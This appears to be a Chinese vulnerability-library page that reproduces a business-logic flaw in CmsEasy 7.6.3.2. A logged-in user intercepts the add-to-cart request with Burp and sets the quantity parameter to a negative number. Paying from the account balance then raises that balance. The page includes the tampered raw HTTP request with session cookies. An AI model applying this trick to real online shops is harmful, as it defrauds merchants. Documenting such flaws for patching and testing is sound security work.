CmsEasy 7.6.3.2_20200422 逻辑漏洞-漏洞文库小世界-安全文库-NGC660安全实验室

CmsEasy 7.6.3.2_20200422 逻辑漏洞

msEasy 7.6.3.2_20200422 逻辑漏洞

一、漏洞简介

二、漏洞影响

CmsEasy 7.6.3.2

三、复现过程

1.登录任意账号

2.点击任意产品

a595266314941f487a53760bf4b77e07

2.点击任意产品

c3f7daa41bf9a11b78988b62daa69800

3.点开任意一个产品,前提是有余量

14201bf392076fe2af613a8ce05e947d

4.输入任意正常数量,burp开启抓包,点击添加到购物车

6c30ce7e890e5b1e16cd97cb713cb808

5.将抓到的包中的最后一个数字改为负数

4aca21d5e6037f5fb8f8f2401563a1ff

d54ced7651b9938043bbd5ffc9bd3b0d

然后放包

GET /index.php?case=archive&act=doorders&aid=527&datatype=&thisnum=-100 HTTP/1.1
Host: www.baidu.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://localhost/index.php?case=archive&act=show&aid=527
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5j671r8cg9kfppbkpl7i0n1te0; loginfalse=0; login_username=admin; login_password=787cc8f99d30dc9cbeeadd77f99efb84; ce_orders_cookie=TL%2BA8RODL9PeNwoN
Connection: close

6.此时可以看到购物车中为负数

c066eb9c1177acb3bd762d2a58c69392

7.查看个人中心中的余额,为5600

7c0b6d1312fcf10aa2b234ae7a454e94

8.点击购物车

86f83e99f199e61c72b55b94e8c85b01

9.点击下图内容

549197dc02bef4ce84cb78bdbdaabe85

10.填写完成之后,点击在线支付

c6b550177877259b4fc55551bbec5564

11.选择余额支付,点击购买

bedf2fea9b242ec4256630ca3a26d681

12.购买成功

48b889e01a02d0815260b1e2305d2d04

13.回到个人中心,可以看到余额的变化

7c118331edca77dd4d644d985f98a8a3

请登录后发表评论

    请登录后查看回复内容